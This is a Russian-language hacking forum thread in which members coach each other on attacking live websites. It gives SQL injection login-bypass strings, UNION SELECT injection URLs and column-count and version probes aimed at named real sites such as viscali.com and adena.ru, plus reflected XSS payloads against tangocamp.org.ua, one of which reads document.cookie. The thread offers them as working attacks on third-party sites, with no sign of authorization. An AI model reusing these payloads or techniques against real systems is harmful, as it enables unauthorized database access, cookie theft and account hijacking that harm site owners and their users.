Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Вобще в данном случае я наверное это бы и посоветовал, но хочу сказать, что в некоторых случаях наличие пробела после -- обязательно, и я думаю если в скрипте подставляется кавычка, то это так и есть, вобщем все как блеки описал, но только в конце пробел
     
  2. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    o3,14um
    пасиба, про скобки я первый раз слышу. в след учту. спс.
     
  3. LordsTN

    LordsTN New Member

    Joined:
    19 Jan 2007
    Messages:
    23
    Likes Received:
    3
    Reputations:
    0
    login=31337 or 1=1--
    pass=qwerty

    Такое не прокатывать, т.е. мой запрос добавляется в
    where login='reallogin' запрос /*,
    мне надо знать хотя бы один реальный логин, а я незнаю,
    как можно в таких случаях поступить, кроме перебора логинов, :(
    очень надо.
     
  4. none222

    none222 Guest

    Reputations:
    0
    Если есть иньекция, очень врядле. что те нужно знать логин.

    ПРобуй ввести как в логин, так и в пароль:
    ' or 1=1/*
    ') or 1=1/*
    ')) or 1=1/*
    ') or ('1'='1
    Вобўем сам эксперементіруй. И ещё многое зависит от того, какой серв БД там стоит!
     
  5. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    можно ли как нибудь вывести слово на страницу через запрос? ведь есть серваки где не показываетсая отчет об ошибке и не понятно есть ли так sql inc
     
  6. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    Да. Вот ссылка для примера.
    Code:
    http://adena.ru/keys.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,'%3CH1%3E%D0%92%D0%AB%D0%92%D0%9E%D0%94%D0%98%D0%9C%D0%AB%D0%99%20%D0%A2%D0%95%D0%9A%D0%A1%D0%A2%3C/H1%3E',22/*
     
  7. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    чет не то
     
  8. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    т.е. это прокатит если знаешь кол-во столбцев, а если нет...
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 bag
    Сформулируй вопрос яснее.Если ты имеешь ввиду как узнать есть ли инъекция при отключенных ошибках сервера то нужно почитать статьи т.к способов очень много и сдесь их все не изложишь Например эту:
    _http://forum.antichat.ru/threadnav43966-1-10.html
    Ну а вооще какой вопрос -такой ответ Dima-k17 написал тебе именно то ,что ты спросил
     
  10. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    да я имею ввиду как узнать есть ли инъекция при отключенных ошибках сервера, статьи читал, я ищу более менее универсальный метод, вывод текста на страницу было бы самое то :)
     
  11. _3lf

    _3lf Member

    Joined:
    17 Mar 2008
    Messages:
    6
    Likes Received:
    7
    Reputations:
    5
    Столкнулся с такой проблемкой, мб поможете... Начнем с начала:)
    Описание уязвимости - http://www.securitylab.ru/vulnerability/312412.php
    Нашол бажный скрипт - http://viscali.com/shop/main_bigware_53.php
    Начал подбирать кол-во полей:
    http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+1/* - нет ошибки
    http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+2/* - ошибка
    Исходя из этого сделал вывод что столбец у нас один.
    Далее http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+union+select+1/*
    Выдает ошибку... Почему, ведь количество столбцов верное?
     
    #1271 _3lf, 20 Mar 2008
    Last edited: 20 Mar 2008
  12. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    колличество то может быть и верное, а вот запрос неверный
     
  13. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    очень возможно, что там подряд идет два запроса, отсюда , когда у тебя верен первый, второй возвращает ложь.
     
  14. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    select 1 фозвращает число ОДИН, а не первый столбец
     
  15. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    http://viscali.com/shop/main_bigware_53.php?op=results&pollid=1+and+substring(version(),1,1)=3

    мускул третий, нет юниона
     
  16. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Только учусь!
    -----------------------
    Подскажите, на что это я наткнулся и как это можно использовать?
    вывод в номерах фоток
    Я такого еще не встречал, подскажите.
     
    1 person likes this.
  17. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Вот прошу)
    Code:
    http://tangocamp.org.ua/gallery?photo=%3Cscript%3Ewhile(1)alert()%3C/script%3E
    можно это XSS, читай маны
     
  18. _3lf

    _3lf Member

    Joined:
    17 Mar 2008
    Messages:
    6
    Likes Received:
    7
    Reputations:
    5
    Спс, вкурил:)
     
  19. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    http://tangocamp.org.ua/gallery?photo=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
    так проще
     
  20. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Спасибо! xss я видел, но подумал, что это еще одна ошибка и к той не имеет отношения. Я ж говорю, что не встречал еще такого, чтоб просто менялся текст без вывода какой либо ошибки
     
Thread Status:
Not open for further replies.